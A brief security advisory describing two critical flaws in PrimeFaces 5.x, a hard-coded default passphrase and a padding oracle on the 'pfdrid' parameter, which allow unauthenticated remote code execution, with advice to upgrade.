PrimeFaces 5.x Expression Language injection

Description

PrimeFaces is a open source User Interface (UI) component library for JavaServer Faces (JSF) based applications. Giorgio Fedon of Minded Security has found two critical vulnerabilities in the PrimeFaces 5.x implementation.

By abusing one of these issues any user can execute arbitrary code on the application server without authentication.

  • PrimeSecret is the default hard-coded passphrase to encrypt several PrimeFaces parameters such as "pfdrid".
  • PrimeOracle is the abuse of a Padding Oracle attack against the internal crypto algorithm that decrypts several parameters such as "pfdrid".

Remediation

Please upgrade to the latest version of PrimeFaces or install the official fix. The official fix can be found in the Web references section.

References
Severity